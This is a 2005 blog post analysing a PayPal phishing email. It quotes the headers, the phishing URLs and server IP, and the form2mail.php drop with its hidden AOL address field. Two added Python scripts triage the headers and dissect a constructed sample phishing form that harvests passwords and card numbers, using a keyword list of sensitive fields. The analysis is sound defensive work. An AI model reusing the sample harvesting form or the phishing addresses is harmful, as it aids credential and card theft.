     Anatomy of a phishing attempt    
     Author:  boz
     Dated:  Thursday, March 17 2005 @ 06:14 PM EST
     Viewed:  1,346 times  
    My News

    Today I got an obviously fraudulent email claiming I need to "update my account information" at PayPal. The site it links to has entry fields for all sorts of personal information, plus credit card account information. I don't have a PayPal account. This isn't the first time I've gotten something like this, but here are the details for this one.

    Screenshot of the email as it appears in my Hotmail account

    The header.

    X-Message-Status: sF
    X-SID-PRA: service@paypal.com 
    X-SID-Result: SoftFail
    X-Message-Info: JGTYoYF78jHcoG/t78wIKx930QsXgE4UFFf2cdDtg3Q=
    Received: from EV1SERVE-GDKQQ6 ([69.57.136.63]) by mc3-f21.hotmail.com with Microsoft SMTPSVC(6.0.3790.211);
    	 Tue, 15 Mar 2005 16:23:19 -0800
    From: "service@paypal.com" 
    Subject: Account Verification.
    To: USERNAME@hotmail.com
    Content-Type: text/html;iso-8859-1
    Reply-To: service@paypal.com
    Date: Tue, 15 Mar 2005 18:23:20 -0600
    X-Priority: 3
    X-Library: Indy 8.0.25
    Return-Path: service@paypal.com
    Message-ID: 
    X-OriginalArrivalTime: 16 Mar 2005 00:23:19.0864 (UTC) FILETIME=[5B164B80:01C529BE]
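
    The same headers, run through a small triage script. This is an added example and not something from the original post; RAW_HEADERS is copied from the header block above (the Message-ID and the angle-bracket address that the page stripped are left out), and the five checks are ordinary manual-triage heuristics: the Sender ID verdict the receiving MTA recorded, whether the first Received hop belongs to the domain the envelope sender claims, Reply-To pointing elsewhere, clock skew between the Date header and the receiver's timestamp, and a mass-mailer library header. The 300-second skew threshold is an assumption.

```python
"""Header triage for the phishing message quoted above.

Added example, not part of the original post. RAW_HEADERS is copied from
the post (the Message-ID and the angle-bracket address that the page
stripped are left out); the checks are ordinary manual-triage heuristics,
not anything the post's author ran.
"""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

RAW_HEADERS = """\
X-Message-Status: sF
X-SID-PRA: service@paypal.com
X-SID-Result: SoftFail
X-Message-Info: JGTYoYF78jHcoG/t78wIKx930QsXgE4UFFf2cdDtg3Q=
Received: from EV1SERVE-GDKQQ6 ([69.57.136.63]) by mc3-f21.hotmail.com with Microsoft SMTPSVC(6.0.3790.211);
\t Tue, 15 Mar 2005 16:23:19 -0800
From: "service@paypal.com"
Subject: Account Verification.
To: USERNAME@hotmail.com
Content-Type: text/html;iso-8859-1
Reply-To: service@paypal.com
Date: Tue, 15 Mar 2005 18:23:20 -0600
X-Priority: 3
X-Library: Indy 8.0.25
Return-Path: service@paypal.com
"""

# "from <host> ([<ip>]) by <host>" as written by Hotmail's SMTPSVC.
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\(\[?([\d.]+)\]?\)\s+by\s+(\S+)")
# Headers added by mail-sending libraries rather than by an MTA.
MAILER_HEADERS = ("X-Library", "X-Mailer")


def domain_of(addr):
    """'"x" <a@b.c>' or 'a@b.c' -> 'b.c' (lower-case); '' if no address."""
    m = re.search(r"@([\w.-]+)", addr)
    return m.group(1).lower() if m else ""


def received_hops(raw):
    """(sending host, sending IP, receiving host) per Received header, outermost first."""
    msg = message_from_string(raw)
    hops = []
    for rcvd in msg.get_all("Received", []):
        m = RECEIVED_RE.search(rcvd)
        if m:
            hops.append(m.groups())
    return hops


def triage(raw, max_skew_seconds=300):
    """Return a list of (check, detail) findings; an empty list means nothing suspicious."""
    msg = message_from_string(raw)
    findings = []

    # 1. Sender ID / SPF verdict recorded by the receiving MTA.
    pra = msg.get("X-SID-PRA", "")
    result = msg.get("X-SID-Result", "")
    if result.lower() != "pass":
        findings.append(("sender-id", f"{pra} evaluated as {result or 'unknown'}"))

    # 2. Does the first hop belong to the domain the envelope sender claims?
    claimed = domain_of(msg.get("Return-Path", "")) or domain_of(msg.get("From", ""))
    for host, ip, by in received_hops(raw):
        if claimed and not host.lower().endswith(claimed):
            findings.append(("received-host", f"{by} got it from {host} [{ip}], not a {claimed} host"))

    # 3. Reply-To pointing somewhere other than the claimed sender domain.
    reply_to = domain_of(msg.get("Reply-To", ""))
    if reply_to and claimed and reply_to != claimed:
        findings.append(("reply-to", f"replies go to {reply_to}"))

    # 4. Clock skew between the sender's Date and the first receiver's timestamp.
    hop_dates = [r.split(";")[-1].strip() for r in msg.get_all("Received", [])]
    if hop_dates and msg.get("Date"):
        sent = parsedate_to_datetime(msg["Date"])
        got = parsedate_to_datetime(hop_dates[0])
        skew = abs((got - sent).total_seconds())
        if skew > max_skew_seconds:
            findings.append(("date-skew", f"{skew:.0f}s between Date and first Received"))

    # 5. Mass-mailer library fingerprint instead of a real MTA chain.
    for h in MAILER_HEADERS:
        if msg.get(h):
            findings.append(("mailer", f"{h}: {msg[h]}"))

    return findings


if __name__ == "__main__":
    for check, detail in triage(RAW_HEADERS):
        print(f"{check:14} {detail}")
```

    On this message the script flags the SoftFail verdict, the non-paypal.com first hop, and the X-Library header; the Date header and Hotmail's timestamp are one second apart, so the skew check stays quiet.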
    
    Clicking on the link to "update" your information takes you to http://add.update.config.cmdcmd.503subscription.info:80/ and then forwards you to an ugly-looking URL that can be simplified to this: http://216.51.232.128/best-greetings-flirting.com/pp/update.htm?=

    If you actually go to the URL, the browser doesn't get that secure lock icon. This idiot fraudster wasn't even nice enough to encrypt the information he's trying to steal. Meh.

    It looks like the form submission results get posted to http://216.51.232.128/best-greetings-flirting.com/pp/form2mail.php

    form2mail.php is a form mailer implemented in PHP. Looking at the HTML source of the form on the page shows a hidden form field called "login_email" whose value is someone's AOL address. Hmmm... After some poking around, it looks like this is likely a compromised Windows 2003 machine.
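
    The same look at the form, as a script. This is an added example, not the post's code and not the real page: SAMPLE_PAGE is a constructed stand-in in which only the form action URL and the hidden field name "login_email" come from the post; the drop-box address "dropbox-placeholder@aol.com" and the visible field names are placeholders, since the post does not reproduce the page's HTML. The checks are the ones an analyst does by hand: plaintext POST, IP-literal host, a form-mailer script as the action, a hidden field carrying an email address (the drop box), and which sensitive fields the form collects.

```python
"""Pull apart a phishing page's form the way the post describes doing by hand.

Added example, not the post's code. SAMPLE_PAGE is constructed: the action
URL and the hidden field name are from the post; the drop-box address and
the visible field names are placeholders.
"""
import re
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlsplit

SAMPLE_PAGE = """
<html><body>
<form method="post" action="http://216.51.232.128/best-greetings-flirting.com/pp/form2mail.php">
  <input type="hidden" name="login_email" value="dropbox-placeholder@aol.com">
  <input type="text" name="email">
  <input type="password" name="password">
  <input type="text" name="card_number">
  <input type="text" name="cvv2">
  <input type="submit" value="Update">
</form>
</body></html>
"""

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
# Field-name fragments that mean the form is after credentials or card data.
SENSITIVE = ("password", "passwd", "card", "cvv", "ssn", "pin")


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": (a.get("type") or "text").lower(),
                                            "name": a.get("name") or "",
                                            "value": a.get("value") or ""})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def parse_forms(html):
    p = FormCollector()
    p.feed(html)
    return p.forms


def is_ip_literal(host):
    """True for a bare IPv4/IPv6 address used as a hostname."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def analyze_form(form):
    """Return a list of (check, detail) findings for one parsed form."""
    findings = []
    url = urlsplit(form["action"])
    if url.scheme == "http":
        findings.append(("plaintext-post", f"fields are sent over HTTP to {url.netloc}"))
    if url.hostname and is_ip_literal(url.hostname):
        findings.append(("ip-literal", url.hostname))
    script = url.path.rsplit("/", 1)[-1]
    if script.endswith(".php") and "mail" in script.lower():
        findings.append(("form-mailer", script))
    for inp in form["inputs"]:
        # A hidden field holding an email address is where the stolen data goes.
        if inp["type"] == "hidden" and EMAIL_RE.match(inp["value"]):
            findings.append(("drop-box", f"{inp['name']} -> {inp['value']}"))
        if inp["type"] == "password" or any(k in inp["name"].lower() for k in SENSITIVE):
            findings.append(("collects", inp["name"]))
    return findings


if __name__ == "__main__":
    for form in parse_forms(SAMPLE_PAGE):
        for check, detail in analyze_form(form):
            print(f"{check:14} {detail}")
```

    The drop-box check is the one worth keeping: a hidden field whose value is an email address tells you where the form mailer delivers the harvested data, which is a more useful lead than the throwaway host the kit is sitting on.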

    What's interesting is that if you go to http://216.51.232.128/best-greetings-flirting.com/pp/ , you get forwarded to theark.ws, which doesn't respond.
